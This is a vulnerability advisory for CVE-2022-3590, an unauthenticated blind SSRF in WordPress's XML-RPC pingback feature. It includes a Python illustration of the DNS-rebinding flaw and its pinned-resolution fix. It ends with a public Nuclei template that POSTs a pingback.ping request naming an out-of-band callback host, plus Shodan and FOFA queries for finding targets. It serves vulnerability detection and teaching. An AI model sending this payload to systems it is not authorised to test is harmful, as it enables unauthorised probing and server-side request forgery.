CVE-2022-3590: WordPress <= 6.2 - Server Side Request Forgery

Date: 2025-08-01 | Affected software: WordPress | PoC: public

Vulnerability description

WordPress is affected by an unauthenticated blind SSRF in the pingback feature (XML-RPC `pingback.ping`, which makes the server fetch the attacker-supplied source URL). The URL validation resolves the hostname and rejects loopback and private addresses, but the HTTP client that performs the actual request resolves the name again afterwards. This time-of-check/time-of-use gap (CWE-367) is a DNS rebinding condition: an attacker-controlled name that answers with a public address to the first lookup and with an internal address such as 127.0.0.1 to the second slips past the check, so the request reaches internal hosts that are explicitly forbidden. The SSRF is blind: the attacker learns that the internal request was made (for example via a DNS or HTTP callback), not its response body.
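
The mechanism described above, as an added example (Python, not code from WordPress or from the template's author): a validator modelled on the shape of the WordPress check (scheme, hostname, resolved address; the real `wp_http_validate_url()` does more), a constructed rebinding resolver that answers with a public address first and 127.0.0.1 afterwards, the vulnerable validate-then-resolve-again fetch beside a hardened resolve-once-and-pin fetch, and the `pingback.ping` body the PoC template POSTs. The hostname `evil.example`, the address 203.0.113.10 and `RebindingResolver` are constructed stand-ins.

```python
"""Added example: DNS-rebinding TOCTOU of the kind behind CVE-2022-3590 (not WordPress code)."""
import ipaddress
import urllib.parse
import xmlrpc.client
from typing import Callable, List

# A resolver maps a hostname to a single IP address string.
Resolver = Callable[[str], str]

# Address ranges a server-side URL fetcher must never contact (assumption: a
# typical deny list; WordPress's own check is shaped like this but not identical).
BLOCKED_NETWORKS: List[ipaddress._BaseNetwork] = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def pingback_body(source_uri: str, target_uri: str) -> str:
    """XML-RPC pingback.ping call, the same shape the PoC template sends to /xmlrpc.php."""
    return xmlrpc.client.dumps((source_uri, target_uri), methodname="pingback.ping")


def is_internal(ip: str) -> bool:
    """True if the address falls in a blocked range; IPv4-mapped IPv6 is unwrapped first."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be treated as 127.0.0.1
    return any(addr in net for net in BLOCKED_NETWORKS)


def validate_url(url: str, resolve: Resolver) -> bool:
    """Time of check: resolve the host and reject internal answers.
    The resolved address is thrown away, which is the root of the TOCTOU."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.hostname.lower() == "localhost":
        return False
    return not is_internal(resolve(parts.hostname))


class RebindingResolver:
    """Constructed attacker DNS: public address on the first query, internal afterwards.
    In a real attack this is an authoritative server for the name with a tiny TTL."""

    def __init__(self, public_ip: str = "203.0.113.10", internal_ip: str = "127.0.0.1"):
        self.answers = [public_ip, internal_ip]
        self.queries = 0

    def __call__(self, hostname: str) -> str:
        ip = self.answers[min(self.queries, len(self.answers) - 1)]
        self.queries += 1
        return ip


def fetch_vulnerable(url: str, resolve: Resolver) -> str:
    """Vulnerable pattern: validate, then let the HTTP client resolve the name again."""
    if not validate_url(url, resolve):
        return "rejected"
    host = urllib.parse.urlsplit(url).hostname
    ip = resolve(host)  # time of use: a second, independent lookup
    return f"connected {ip}"


def fetch_pinned(url: str, resolve: Resolver) -> str:
    """Hardened pattern: resolve once, validate that exact address, connect to that
    address (a real client would send the original Host header alongside it)."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "rejected"
    if parts.hostname.lower() == "localhost":
        return "rejected"
    ip = resolve(parts.hostname)  # the only lookup; check and use share it
    if is_internal(ip):
        return "rejected"
    return f"connected {ip}"


if __name__ == "__main__":
    url = "http://evil.example/"  # constructed attacker-controlled name
    print("vulnerable:", fetch_vulnerable(url, RebindingResolver()))  # connected 127.0.0.1
    print("pinned:    ", fetch_pinned(url, RebindingResolver()))      # connected 203.0.113.10
    print(pingback_body(url, "http://victim.example/?p=1"))
```

Note what the Nuclei template on this page actually proves: its second request succeeds when the pingback fetch causes a DNS lookup of the interactsh name, which shows that an unauthenticated caller can make the server issue outbound requests, combined with a version banner of 6.2 or older. Reaching an internal host through the rebinding gap needs an attacker-controlled authoritative DNS server, which the template does not exercise.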

PoC code [public]

id: CVE-2022-3590

info:
  name: WordPress <= 6.2 - Server Side Request Forgery
  author: riteshs4hu
  severity: medium
  description: |
    WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
  reference:
    - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
    - https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2022-3590
    cwe-id: CWE-367
    epss-score: 0.14174
    epss-percentile: 0.94155
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wordpress
    product: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: regex
        part: body
        regex:
          - 'WordPress\s+(?:[1-5]\.\d+(?:\.\d+)?|6\.[0-2](?:\.\d+)?)'
        internal: true

  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value><string>http://{{interactsh-url}}/</string></value>
            </param>
            <param>
              <value><string>{{RootURL}}/?p=1</string></value>
            </param>
          </params>
        </methodCall>
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, '<methodResponse>','faultCode','<fault>')"
          - "contains(content_type, 'text/xml')"
          - "contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a00473045022100f6082f7d238b20b9fe8e329edcf613b14d25a1c7296f8f147fd38dc9db37d7f50220730a454a08d5aea5fe040f71b979da123e983d76f871462bb9fc415385804c9c:922c64590222798bb761d5b6d8e72950
